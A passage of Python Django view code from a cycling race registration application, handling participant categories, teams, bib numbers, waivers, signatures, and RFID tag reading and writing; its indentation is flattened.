return print_pdf( request, participant, print_shoulder_bib(participant), 'Shoulder' )
@access_validation()
def ParticipantPrintAllBib( request, participantId ):
participant = get_participant( participantId )
c = participant.competition
ret = None
if c.bibs_label_print:
ret = ParticipantPrintBodyBib( request, participantId, 2 )
elif c.bib_label_print:
ret = ParticipantPrintBodyBib( request, participantId, 1 )
if c.bibs_laser_print:
ret = ParticipantPrintBodyBib( request, participantId, 2, 1 )
if c.shoulders_label_print:
ret = ParticipantPrintShoulderBib( request, participantId )
if c.frame_label_print:
ret = ParticipantPrintBibLabels( request, participantId )
elif c.frame_label_print_1:
ret = ParticipantPrintBibLabel1( request, participantId )
return ret
@access_validation()
def ParticipantPrintEmergencyContactInfo( request, participantId ):
participant = get_participant( participantId )
return print_pdf( request, participant, print_id_label(participant), 'Emergency' )
def ParticipantEmergencyContactInfo( request, participantId ):
participant = get_participant( participantId )
license_holder = participant.license_holder
competition = participant.competition
team_members = None
if participant.team:
team_members_non_competitors_at_competition = LicenseHolder.objects.filter(
pk__in=Participant.objects.filter(competition=competition,team=participant.team).exclude(
license_holder=license_holder).exclude(
role=Participant.Competitor).values_list('license_holder',flat=True).distinct()
)
team_members_at_competition = LicenseHolder.objects.filter(
pk__in=Participant.objects.filter(competition=competition,team=participant.team,role=Participant.Competitor).exclude(
license_holder=license_holder).values_list('license_holder',flat=True).distinct()
)
team_members_other = LicenseHolder.objects.filter(
pk__in=Participant.objects.filter(
team=participant.team).exclude(
competition=competition).exclude(
license_holder=license_holder).exclude(
license_holder__in=team_members_at_competition).exclude(
license_holder__in=team_members_non_competitors_at_competition).values_list('license_holder',flat=True).distinct()
)
else:
team_members_non_competitors_at_competition = LicenseHolder.objects.none()
team_members_at_competition = LicenseHolder.objects.none()
team_members_other = LicenseHolder.objects.none()
return render( request, 'participant_emergency_info.html', locals() )
@autostrip
class ParticipantCategorySelectForm( Form ):
gender = forms.ChoiceField( choices = (
(-1, _('All')),
(0, _('Men / Open')),
(1, _('Women / Open')),
(2, _('Open')),
),
initial = -1 )
def __init__(self, *args, **kwargs):
super(ParticipantCategorySelectForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' ),
CancelButton(),
]
self.helper.layout = Layout(
HTML( u'{}: '.format( _("Search") ) ),
Div( Field('gender', css_class = 'form-control'), css_class = 'form-group' ),
HTML( u' ' ),
button_args[0],
button_args[1],
)
@access_validation()
def ParticipantCategoryChange( request, participantId ):
participant = get_participant( participantId )
competition = participant.competition
license_holder = participant.license_holder
competition_age = competition.competition_age( license_holder )
gender = None
if request.method == 'POST':
form = ParticipantCategorySelectForm( request.POST )
if form.is_valid():
gender = int(form.cleaned_data['gender'])
else:
gender = license_holder.gender
form = ParticipantCategorySelectForm( initial = dict(gender=gender) )
categories = Category.objects.filter( format=competition.category_format )
if gender == None:
gender = license_holder.gender
if gender != -1:
categories = categories.filter( Q(gender=2) | Q(gender=gender) )
available_categories = set( competition.get_available_categories(license_holder, gender=gender, participant_exclude=participant) )
categories_with_numbers = set()
for cn in CategoryNumbers.objects.filter( competition=competition ):
if cn.get_numbers():
categories_with_numbers |= set( cn.categories.all() )
return render( request, 'participant_category_select.html', locals() )
@access_validation()
def ParticipantCategorySelect( request, participantId, categoryId ):
participant = get_participant( participantId )
competition = participant.competition
category = get_object_or_404( Category, pk=categoryId ) if int(categoryId) else None
category_changed = (participant.category != category)
if category and category_changed:
categories = set( p.category
for p in Participant.objects.filter(
competition=competition, license_holder=participant.license_holder).exclude(
category__isnull=True).select_related('category')
)
if category in categories:
has_error, conflict_explanation, conflict_participant = True, _('LicenseHolder is already participating in this Category.'), None
return render( request, 'participant_integrity_error.html', locals() )
categories.discard( participant.category )
categories.add( category )
is_category_conflict, category_conflict_event, category_conflict_categories = competition.is_category_conflict(categories)
if is_category_conflict:
has_error, conflict_explanation, conflict_participant = True, _('Cannot assign to another Category that already exists in an Event.'), None
categories = sorted(categories, key=lambda c: c.sequence)
category_conflict_categories = sorted(category_conflict_categories, key=lambda c: c.sequence)
return render( request, 'participant_integrity_error.html', locals() )
participant.category = category
if category and participant.role != Participant.Competitor:
participant.role = Participant.Competitor
participant.update_bib_new_category()
if category_changed:
participant.license_checked = False
try:
participant.auto_confirm().save()
except IntegrityError:
has_error, conflict_explanation, conflict_participant = participant.explain_integrity_error()
return render( request, 'participant_integrity_error.html', locals() )
if category_changed:
participant.add_to_default_optional_events()
return HttpResponseRedirect(getContext(request,'pop2Url'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantRoleChange( request, participantId ):
participant = get_participant( participantId )
return render( request, 'participant_role_select.html', locals() )
@access_validation()
def ParticipantRoleSelect( request, participantId, role ):
participant = get_participant( participantId )
participant.role = int(role)
if participant.role != Participant.Competitor:
participant.bib = None
participant.category = None
if participant.role >= 200: # Remove team for non-team roles.
participant.team = None
else:
participant.init_default_values()
participant.auto_confirm().save()
return HttpResponseRedirect(getContext(request,'pop2Url'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantLicenseCheckChange( request, participantId ):
participant = get_participant( participantId )
cco = CompetitionCategoryOption.objects.filter( competition=participant.competition, category=participant.category ).first()
note = cco.note if cco else u''
return render( request, 'participant_license_check_select.html', locals() )
@access_validation()
def ParticipantLicenseCheckSelect( request, participantId, status ):
participant = get_participant( participantId )
participant.license_checked = bool(int(status))
if not participant.license_checked:
LicenseCheckState.uncheck_participant( participant )
participant.auto_confirm().save()
return HttpResponseRedirect(getContext(request,'pop2Url'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantBooleanChange( request, participantId, field ):
participant = get_participant( participantId )
setattr( participant, field, not getattr(participant, field) )
if field != 'confirmed':
participant.auto_confirm()
participant.save()
return HttpResponseRedirect(getContext(request,'cancelUrl'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantTeamChange( request, participantId ):
participant = get_participant( participantId )
search_text = request.session.get('teams_filter', '')
btns = [('new-submit', _('New Team'), 'btn btn-success')]
if request.method == 'POST':
if 'cancel-submit' in request.POST:
return HttpResponseRedirect(getContext(request,'cancelUrl'))
if 'new-submit' in request.POST:
return HttpResponseRedirect( pushUrl(request,'TeamNew') )
form = SearchForm( btns, request.POST )
if form.is_valid():
search_text = form.cleaned_data['search_text']
request.session['teams_filter'] = search_text
else:
form = SearchForm( btns, initial = {'search_text': search_text} )
search_text = utils.normalizeSearch(search_text)
q = Q( active=True )
for n in search_text.split():
q &= Q( search_text__contains = n )
teams = Team.objects.filter(q)[:MaxReturn]
return render( request, 'participant_team_select.html', locals() )
@access_validation()
def ParticipantTeamSelect( request, participantId, teamId ):
participant = get_participant( participantId )
if int(teamId):
team = get_object_or_404( Team, pk=teamId )
else:
team = None
if False:
participant.team = team
participant.auto_confirm().save()
return HttpResponseRedirect(getContext(request,'pop2Url'))
return HttpResponseRedirect(getContext(request,'popUrl') + 'ParticipantTeamSelectDiscipline/{}/{}/'.format(participantId,teamId))
def get_ioc_countries():
countries = [(name, code) for code, name in ioc_country.items()]
countries.sort( key=operator.itemgetter(1) )
return countries
@access_validation()
def LicenseHolderNationCodeSelect( request, licenseHolderId, iocI ):
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
iocI = int(iocI)
if iocI < 0:
license_holder.nation_code = u''
else:
license_holder.nation_code = get_ioc_countries()[iocI][-1]
license_holder.save()
return HttpResponseRedirect(getContext(request,'popUrl'))
@access_validation()
def LicenseHolderNationCodeChange( request, licenseHolderId ):
license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
countries = [[i, flag_html(c[-1])] + list(c) for i, c in enumerate(get_ioc_countries())]
flag_instance = u''
code_instance = u''
name_instance = u''
for c in countries:
if c[-1] == license_holder.nation_code:
flag_instance = c[1]
ioc_instance = c[-1]
name_instance = c[-2]
break
rows = []
cols = 4
for i in range(0, len(countries), cols):
rows.append( countries[i:i+cols] )
return render( request, 'license_holder_nation_code_select.html', locals() )
@autostrip
class TeamDisciplineForm( Form ):
disciplines = forms.MultipleChoiceField(required=False, widget=forms.CheckboxSelectMultiple,)
def __init__(self, *args, **kwargs):
super(TeamDisciplineForm, self).__init__(*args, **kwargs)
self.fields['disciplines'].choices = [(d.id, d.name) for d in Discipline.objects.all()]
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = ''
buttons = [
Submit( 'set-all-submit', _('Same Team for All Disciplines'), css_class = 'btn btn-primary' ),
Submit( 'set-selected-submit', _('Team for Selected Disciplines Only'), css_class = 'btn btn-primary' ),
CancelButton(),
]
self.helper.layout = Layout(
Row( buttons[0], HTML(' '*8), buttons[2] ),
Field('disciplines'),
Row( buttons[1] ),
)
@access_validation()
def ParticipantTeamSelectDiscipline( request, participantId, teamId ):
participant = get_participant( participantId )
competition = participant.competition
if int(teamId):
team = get_object_or_404( Team, pk=teamId )
else:
team = None
if request.method == 'POST':
disciplines = []
if 'set-all-submit' in request.POST:
disciplines = list( Discipline.objects.all().values_list('id', flat=True) )
elif 'set-selected-submit' in request.POST:
form = TeamDisciplineForm( request.POST )
if form.is_valid():
disciplines = form.cleaned_data['disciplines']
participant.team = team
participant.auto_confirm().save()
today = timezone.localtime(timezone.now()).date()
for id in disciplines:
if team:
try:
th = TeamHint.objects.get( discipline__id=id, license_holder=participant.license_holder )
if th.team_id == team.id:
continue
th.team = team
except TeamHint.DoesNotExist:
th = TeamHint( license_holder=participant.license_holder, team=team )
th.discipline_id = id
th.effective_date = today
th.save()
else:
TeamHint.objects.filter( discipline__id=id, license_holder=participant.license_holder ).delete()
return HttpResponseRedirect(getContext(request,'pop2Url'))
else:
form = TeamDisciplineForm( initial = {'disciplines': [competition.discipline_id]} )
return render( request, 'participant_team_select_discipline.html', locals() )
#-----------------------------------------------------------------------
class Bib( object ):
def __init__( self, bib, license_holder = None, date_lost=None ):
self.bib = bib
self.license_holder = license_holder
self.full_name = license_holder.full_name() if license_holder else u''
self.date_lost = date_lost
@access_validation()
def ParticipantBibChange( request, participantId ):
participant = get_participant( participantId )
if not participant.category:
return HttpResponseRedirect(getContext(request,'cancelUrl'))
competition = participant.competition
category = participant.category
number_set = competition.number_set
available_numbers, allocated_numbers, lost_bibs, category_numbers_defined = participant.get_available_numbers()
bibs = [Bib(n, allocated_numbers.get(n, None), lost_bibs.get(n,None)) for n in available_numbers]
del available_numbers
del allocated_numbers
del lost_bibs
if bibs and participant.category:
participants = Participant.objects.filter(competition=competition, category=participant.category).exclude(bib__isnull=True)
bib_participants = { p.bib:p for p in participants }
for b in bibs:
try:
b.full_name = bib_participants[b.bib].full_name_team
except:
pass
has_existing_number_set_bib = (
number_set and
participant.bib == number_set.get_bib( competition, participant.license_holder, participant.category )
)
return render( request, 'participant_bib_select.html', locals() )
@access_validation()
def ParticipantBibSelect( request, participantId, bib ):
participant = get_participant( participantId )
competition = participant.competition
def done():
return HttpResponseRedirect(getContext(request,'pop2Url'))
def showSelectAgain():
return HttpResponseRedirect(getContext(request,'popUrl'))
bib_save = participant.bib
bib = int(bib)
# No change - nothing to do.
if bib == bib_save:
return done()
if competition.number_set and bib_save is not None:
def set_lost():
competition.number_set.set_lost( bib_save, participant.license_holder )
else:
def set_lost():
pass
# Bib assigned "No Bib".
if bib < 0:
participant.bib = None
set_lost()
return done()
# Assign new Bib.
participant.bib = bib
# Check for conflict in events.
if participant.category:
bib_conflicts = participant.get_bib_conflicts()
if bib_conflicts:
# If conflict, restore the previous bib and repeat.
participant.bib = bib_save
return showSelectAgain()
set_lost()
try:
participant.auto_confirm().save()
except IntegrityError as e:
# Assume the Integrity Error is due to a race condition with the bib number.
return showSelectAgain()
return done()
#-----------------------------------------------------------------------
@autostrip
class ParticipantNoteForm( Form ):
note = forms.CharField( widget = forms.Textarea, required = False, label = _('Note') )
def __init__(self, *args, **kwargs):
super(ParticipantNoteForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
CancelButton(),
]
self.helper.layout = Layout(
Row(
Field('note', css_class = 'form-control', cols = '60'),
),
Row(
button_args[0],
button_args[1],
)
)
@access_validation()
def ParticipantNoteChange( request, participantId ):
participant = get_participant( participantId )
competition = participant.competition
license_holder = participant.license_holder
if request.method == 'POST':
form = ParticipantNoteForm( request.POST )
if form.is_valid():
note = form.cleaned_data['note']
participant.note = note
participant.auto_confirm().save()
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = ParticipantNoteForm( initial = dict(note = participant.note) )
return render( request, 'participant_note_change.html', locals() )
@access_validation()
def ParticipantGeneralNoteChange( request, participantId ):
participant = get_participant( participantId )
competition = participant.competition
license_holder = participant.license_holder
if request.method == 'POST':
form = ParticipantNoteForm( request.POST )
if form.is_valid():
note = form.cleaned_data['note']
license_holder.note = note
license_holder.save()
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = ParticipantNoteForm( initial = dict(note = license_holder.note) )
return render( request, 'participant_note_change.html', locals() )
#-----------------------------------------------------------------------
def GetParticipantOptionForm( participation_optional_events ):
choices = [(event.option_id, u'{} ({})'.format(event.name, event.get_event_type_display()))
for event, is_participating in participation_optional_events]
@autostrip
class ParticipantOptionForm( Form ):
options = forms.MultipleChoiceField( required = False, label = _('Optional Events'), choices=choices )
def __init__(self, *args, **kwargs):
super(ParticipantOptionForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
CancelButton(),
]
self.helper.layout = Layout(
Row(
Field('options', css_class = 'form-control', size = '20'),
),
Row(
button_args[0],
button_args[1],
)
)
return ParticipantOptionForm
@access_validation()
def ParticipantOptionChange( request, participantId ):
participant = get_participant( participantId )
competition = participant.competition
license_holder = participant.license_holder
participation_events = participant.get_participant_events()
participation_optional_events = [(event, is_participating) for event, optional, is_participating in participation_events if optional]
if request.method == 'POST':
form = GetParticipantOptionForm( participation_optional_events )( request.POST )
if form.is_valid():
options = form.cleaned_data['options']
ParticipantOption.set_option_ids( participant, options )
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = GetParticipantOptionForm( participation_optional_events )(
initial = dict(options = [event.option_id for event, is_participating in participation_optional_events if is_participating])
)
return render( request, 'participant_option_change.html', locals() )
#-----------------------------------------------------------------------
def GetParticipantEstSpeedForm( participant ):
competition = participant.competition
km = participant.get_tt_km()
@autostrip
class ParticipantEstSpeedForm( Form ):
est_speed = forms.FloatField( required = False,
label=format_lazy(u'{} ({})', _('Estimated Speed for Time Trial'), competition.speed_unit_display),
help_text=_('Enter a value or choose from the grid below.')
)
if km:
est_duration = DurationField.DurationFormField( required = False,
label=format_lazy(u'{} ({})', _('or Estimated Time for Time Trial'), participant.get_tt_distance_text() ),
help_text=_('In [HH:]MM:SS format.')
)
seed_option = forms.ChoiceField( required = False, choices=Participant.SEED_OPTION_CHOICES, label=_('Seed Option'),
help_text=_('Tells RaceDB to start this rider as Early or as Late as possible in the Start Wave')
)
def __init__(self, *args, **kwargs):
super(ParticipantEstSpeedForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
CancelButton(),
]
self.helper.layout = Layout(
Row(
Col(Field('est_speed', css_class = 'form-control', size = '20'), 4),
Col(Field('est_duration'), 4) if km else HTML(''),
Col(Field('seed_option'), 4),
),
Row(
button_args[0],
button_args[1],
)
)
return ParticipantEstSpeedForm
@access_validation()
def ParticipantEstSpeedChange( request, participantId ):
participant = get_participant( participantId )
competition = participant.competition
license_holder = participant.license_holder
if request.method == 'POST':
form = GetParticipantEstSpeedForm(participant)( request.POST )
if form.is_valid():
est_speed = form.cleaned_data['est_speed']
participant.est_kmh = competition.to_kmh( est_speed or 0.0 )
participant.seed_option = form.cleaned_data['seed_option']
participant.save()
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = GetParticipantEstSpeedForm(participant)(
initial = dict( est_speed=competition.to_local_speed(participant.est_kmh), seed_option=participant.seed_option )
)
speed_rc = {}
if competition.distance_unit == 0:
for col, kmh in enumerate(range(20, 51)):
for row, decimal in enumerate(range(0, 10)):
speed_rc[(col, row)] = u'{}.{:01d}'.format(kmh, decimal)
else:
for col, mph in enumerate(range(12, 32)):
for row, decimal in enumerate(range(0, 10)):
speed_rc[(col, row)] = u'{}.{:01d}'.format(mph, decimal)
row_max = max( row for row, col in speed_rc.keys() ) + 1
col_max = max( col for row, col in speed_rc.keys() ) + 1
speed_table = [ [ speed_rc[(row, col)] for col in range(col_max) ] for row in range(row_max) ]
speed_table.reverse()
return render( request, 'participant_est_speed_change.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantWaiverForm( Form ):
def __init__(self, *args, **kwargs):
super(ParticipantWaiverForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'ok-submit', _('Waiver Correct and Signed'), css_class = 'btn btn-success' ),
Submit( 'not-ok-submit', _('Waiver Incorrect or Unsigned'), css_class = 'btn btn-danger' ),
CancelButton(),
]
self.helper.layout = Layout(
Row(button_args[0]),
Row(HTML(' ')),
Row(button_args[1]),
Row(HTML(' ')),
Row(button_args[2]),
)
@access_validation()
def ParticipantWaiverChange( request, participantId ):
participant = get_participant( participantId )
if request.method == 'POST':
if 'ok-submit' in request.POST:
participant.sign_waiver_now()
elif 'not-ok-submit' in request.POST:
participant.unsign_waiver_now()
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = ParticipantWaiverForm()
return render( request, 'participant_waiver_change.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantTagForm( Form ):
tag = forms.CharField( required = False, label = _('Tag') )
make_this_existing_tag = forms.BooleanField( required = False, label = _('Rider keeps tag for other races') )
rfid_antenna = forms.ChoiceField( choices = ((0,_('None')), (1,'1'), (2,'2'), (3,'3'), (4,'4') ), label = _('RFID Antenna') )
def __init__(self, *args, **kwargs):
super(ParticipantTagForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_class = 'navbar-form navbar-left'
button_args = [
Submit( 'ok-submit', _('Update Tag in Database'), css_class = 'btn btn-primary' ),
CancelButton(),
Submit( 'auto-generate-tag-submit', _('Auto Generate Tag Only - Do Not Write'), css_class = 'btn btn-primary' ),
Submit( 'write-tag-submit', _('Write Existing Tag'), css_class = 'btn btn-primary' ),
Submit( 'auto-generate-and-write-tag-submit', _('Auto Generate and Write Tag'), css_class='btn btn-success' ),
Submit( 'check-tag-submit', _('Check Tag'), css_class = 'btn btn-lg btn-block btn-success' ),
Submit( 'associate-existing-tag-submit', _('Update Database from Tag'), css_class='btn btn-primary' ),
]
self.helper.layout = Layout(
Row( Col(button_args[5], 8), Col(button_args[1], 4) ),
Row( HTML('<hr style="margin:32px"/>') ),
Row(
Col( Field('tag', rows='2', cols='60'), 5 ),
Col( Field('make_this_existing_tag'), 4 ),
Col( Field('rfid_antenna'), 3 ),
),
HTML( '<br/>' ),
Row(
button_args[4], HTML( ' ' * 5 ),
button_args[3], HTML( ' ' * 5 ),
button_args[6],
),
HTML( '<br/>' * 2 ),
Row(
button_args[2],
),
HTML( '<br/>' * 2 ),
Row(
button_args[0],
HTML( ' ' * 5 ),
button_args[1],
),
)
def get_bits_from_hex( s ):
return len(s or '') * 4
@access_validation()
def ParticipantTagChange( request, participantId ):
participant = get_participant( participantId )
competition = participant.competition
license_holder = participant.license_holder
system_info = SystemInfo.get_singleton()
rfid_antenna = int(request.session.get('rfid_antenna', 0))
validate_success = False
status = True
status_entries = []
def check_antenna( rfid_antenna ):
if not rfid_antenna:
status_entries.append(
(_('RFID Antenna Configuration'), (
_('RFID Antenna must be specified.'),
_('Please specify the RFID Antenna.'),
)),
)
return False
return True
def check_empty_tag( tag ):
if not tag:
status_entries.append(
(_('Empty Tag'), (
_('Cannot validate an empty Tag.'),
_('Please generate a Tag, or press Cancel.'),
)),
)
return False
return True
def check_unique_tag( tag, make_this_existing_tag ):
if make_this_existing_tag:
lh = LicenseHolder.objects.filter( existing_tag=tag ).exclude( pk=license_holder.pk ).first()
if lh:
status_entries.append(
(_('Duplicate Tag'), (
_('Tag already in use by LicenseHolder.'),
lh.__repr__(),
)),
)
return False
p = Participant.objects.filter( competition=competition, tag=tag ).exclude( license_holder=license_holder ).first()
if p:
status_entries.append(
(_('Duplicate Tag'), (
_('Tag already in use by Participant.'),
p.license_holder.__repr__(),
)),
)
return False
return True
def check_one_tag_read( tags ):
if not tags:
status_entries.append(
(_('Tag Read Failure'), (
_('No tags read. Verify antenna number and that tag is close to antenna.'),
)),
)
return False
if len(tags) > 1:
status_entries.append(
(_('Multiple Tags Read'), [add_name_to_tag(competition, t) for t in tags] ),
)
return False
return True
def participant_save( particiant ):
try:
participant.auto_confirm().save()
except IntegrityError as e:
# Report the error - probably a non-unique field.
has_error, conflict_explanation, conflict_participant = participant.explain_integrity_error()
status_entries.append(
(_('Participant Save Failure'), (
u'{}'.format(e),
)),
)
return False
return True
if request.method == 'POST':
form = ParticipantTagForm( request.POST )
if form.is_valid():
tag = form.cleaned_data['tag'].strip().upper()
make_this_existing_tag = form.cleaned_data['make_this_existing_tag']
rfid_antenna = request.session['rfid_antenna'] = int(form.cleaned_data['rfid_antenna'])
if 'check-tag-submit' in request.POST:
status &= check_antenna(rfid_antenna) and check_empty_tag(tag)
if status:
status, response = ReadTag(rfid_antenna)
if not status:
status_entries = [
(_('Tag Read Failure'), response.get('errors',[]) ),
]
else:
tags = response.get('tags', [])
status &= check_one_tag_read( tags )
if status:
tag_read = tags[0]
if tag_read == tag:
validate_success = True
participant.tag_checked = True
# Fallthrough so that the tag format is checked.
else:
status = False
status_entries.append(
(_('Tag Validation Failure'), [tag_read, _('***DOES NOT MATCH***'), tag] ),
)
participant.tag_checked = False
status &= participant_save( participant )
elif 'auto-generate-tag-submit' in request.POST or 'auto-generate-and-write-tag-submit' in request.POST:
participant.tag_checked = False
if ( competition.use_existing_tags and
system_info.tag_creation == 0 and get_bits_from_hex(license_holder.existing_tag) == system_info.tag_bits):
tag = license_holder.existing_tag
else:
tag = license_holder.get_unique_tag( system_info )
elif 'associate-existing-tag-submit' in request.POST:
status &= check_antenna(rfid_antenna)
if status:
status, response = ReadTag(rfid_antenna)
if not status:
status_entries = [
(_('Tag Read Failure'), response.get('errors',[]) ),
]
else:
tags = response.get('tags', [])
status &= check_one_tag_read( tags )
if status:
tag = tags[0]
status &= check_unique_tag( tag, make_this_existing_tag )
if status:
participant.tag_checked = True
if status:
status &= check_empty_tag( tag )
if status and system_info.tag_all_hex and not utils.allHex(tag):
status = False
status_entries.append(
(_('Non-Hex Characters in Tag'), (
_('All Tag characters must be hexadecimal ("0123456789ABCDEF").'),
_('Please change the Tag to all hexadecimal.'),
)),
)
if not status:
participant.tag_checked = False
participant_save( participant )
return render( request, 'rfid_write_status.html', locals() )
participant.tag = tag
status &= participant_save( participant )
if not status:
return render( request, 'rfid_write_status.html', locals() )
if make_this_existing_tag and license_holder.existing_tag != tag:
license_holder.existing_tag = tag
try:
license_holder.save()
except Exception as e:
# Report the error - probably a non-unique field.
status = False
status_entries.append(
(
format_lazy(u'{}: {}', _('LicenseHolder'), _('Existing Tag Save Exception:')),
(u'{}'.format(e),)
),
)
return render( request, 'rfid_write_status.html', locals() )
if 'write-tag-submit' in request.POST or 'auto-generate-and-write-tag-submit' in request.POST:
status &= check_antenna( rfid_antenna )
if status:
status, response = WriteTag(tag, rfid_antenna)
if not status:
participant.tag_checked = False
participant_save( participant )
status_entries = [
(_('Tag Write Failure'), response.get('errors',[]) ),
]
else:
participant.tag_checked = True
status &= participant_save( participant )
if not status:
return render( request, 'rfid_write_status.html', locals() )
# if status: fall through to ok-submit case.
# ok-submit
if 'auto-generate-tag-submit' in request.POST:
return HttpResponseRedirect(getContext(request,'path'))
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = ParticipantTagForm( initial = dict(tag=participant.tag, rfid_antenna=rfid_antenna, make_this_existing_tag=competition.use_existing_tags) )
return render( request, 'participant_tag_change.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantSignatureForm( Form ):
signature = forms.CharField( required = False, label = _('Signature') )
def __init__(self, *args, **kwargs):
is_jsignature = kwargs.pop( 'is_jsignature', True )
super(ParticipantSignatureForm, self).__init__(*args, **kwargs)
self.helper = FormHelper( self )
self.helper.form_action = '.'
self.helper.form_id = 'id_signature_form'
self.helper.form_class = 'navbar-form navbar-left'
if is_jsignature:
button_args = [
Submit( 'ok-submit', format_lazy( u'{}{}{}', ' '*10, _('OK'), ' '*10), css_class = 'btn btn-success', style='font-size:200%' ),
CancelButton( style='font-size:200%' ),
HTML(u'<button class="btn btn-warning hidden-print" onClick="reset_signature()">{}</button>'.format(_('Reset'))),
]
else:
button_args = [
HTML(' '*24),
CancelButton( style='font-size:150%' )
]
if is_jsignature:
self.helper.layout = Layout(
Container(
Row( Col(Field('signature'), 12) ),
Row( Col(Div(id="id_signature_canvas"), 12) ),
Row(
Col(button_args[0],4),
Col(button_args[1],4),
Col(button_args[2],4),
),
)
)
else:
self.helper.layout = Layout(
Container(
Row( Col( Field( 'signature' ), 12) ),
Row( Div( Div(*button_args, css_class='row'), css_class='col-md-12 text-center' ) ),
)
)
@access_validation()
def ParticipantSignatureChange( request, participantId ):
participant = get_participant( participantId )
signature_with_touch_screen = int(request.session.get('signature_with_touch_screen', True))
if request.method == 'POST':
form = ParticipantSignatureForm( request.POST, is_jsignature=signature_with_touch_screen )
if form.is_valid():
signature = form.cleaned_data['signature']
signature = signature.strip()
if not signature:
return HttpResponseRedirect(getContext(request,'path'))
participant.signature = signature
participant.auto_confirm().save()
return HttpResponseRedirect(getContext(request,'cancelUrl'))
else:
form = ParticipantSignatureForm( is_jsignature=signature_with_touch_screen )
if signature_with_touch_screen:
return render( request, 'participant_jsignature_change.html', locals() )
else:
return render( request, 'participant_signature_change.html', locals() )
@access_validation()
def SetSignatureWithTouchScreen( request, use_touch_screen ):
request.session['signature_with_touch_screen'] = bool(int(use_touch_screen))
return HttpResponseRedirect(getContext(request,'cancelUrl'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantBarcodeAdd( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
add_by_barcode = True
if request.method == 'POST':
form = BarcodeScanForm( request.POST, hide_cancel_button=True )
if form.is_valid():
scan = form.cleaned_data['scan'].strip()
if not scan:
return HttpResponseRedirect(getContext(request,'path'))
license_holder, participants = participant_key_filter( competition, scan, False )
license_holders = [] # Required for participant_scan_error.
if not license_holder:
return render( request, 'participant_scan_error.html', locals() )
if len(participants) == 1:
return HttpResponseRedirect(pushUrl(request,'ParticipantEdit',participants[0].id))
if len(participants) > 1:
return render( request, 'participant_scan_error.html', locals() )
return HttpResponseRedirect(pushUrl(request,'LicenseHolderAddConfirm', competition.id, license_holder.id))
else:
form = BarcodeScanForm( hide_cancel_button=True )
return render( request, 'participant_scan_form.html', locals() )
'''
@access_validation()
def ParticipantNotFoundError( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
return render( request, 'participant_not_found_error.html', locals() )
@access_validation()
def ParticipantMultiFoundError( request, competitionId ):
competition = get_object_or_404( Competition, pk=competitionId )
return render( request, 'participant_multi_found_error.html', locals() )
'''
#-----------------------------------------------------------------------
@access_validation()
def ParticipantRfidAdd( request, competitionId, autoSubmit=False ):
competition = get_object_or_404( Competition, pk=competitionId )
rfid_antenna = int(request.session.get('rfid_antenna', 0))
status = True
status_entries = []
rfid_tag = None
rfid_tags = []
add_by_rfid = True
if request.method == 'POST':
form = RfidScanForm( request.POST, hide_cancel_button=True )
if form.is_valid():
request.session['rfid_antenna'] = rfid_antenna = int(form.cleaned_data['rfid_antenna'])
if not rfid_antenna:
status = False
status_entries.append(
(_('RFID Antenna Configuration'), (
_('RFID Antenna for Tag Read must be specified.'),
_('Please specify the RFID Antenna.'),
)),
)
else:
status, response = ReadTag(rfid_antenna)
# DEBUG DEBUG
#status, response = True, {'rfid_tags': ['A7A2102303']}
if not status:
status_entries.append(
(_('Tag Read Failure'), response.get('errors',[]) ),
)
else:
rfid_tags = response.get('tags', [])
try:
rfid_tag = rfid_tags[0]
except (AttributeError, IndexError) as e:
status = False
status_entries.append(
(_('Tag Read Failure'), [e] ),
)
if rfid_tag and len(rfid_tags) > 1:
status = False
status_entries.append(
(_('Multiple Tags Read'), rfid_tags ),
)
if not status:
return render( request, 'participant_scan_rfid.html', locals() )
license_holder, participants = participant_key_filter( competition, rfid_tag, False )
license_holders = [] # Required for participant_scan_error.
if not license_holder:
return render( request, 'participant_scan_error.html', locals() )
if len(participants) == 1:
participants[0].set_tag_checked()
return HttpResponseRedirect(pushUrl(request,'ParticipantEdit',participants[0].id))
if len(participants) > 1:
return render( request, 'participant_scan_error.html', locals() )
return HttpResponseRedirect(pushUrl(request,'LicenseHolderAddConfirm', competition.id, license_holder.id, 1))
else:
form = RfidScanForm( initial=dict(rfid_antenna=rfid_antenna), hide_cancel_button=True )
return render( request, 'participant_scan_rfid.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantConfirmForm( Form ):
participant_id = forms.IntegerField()
last_name = forms.CharField( label = _('Last Name') )
first_name = forms.CharField( required=False, label = _('First Name') )
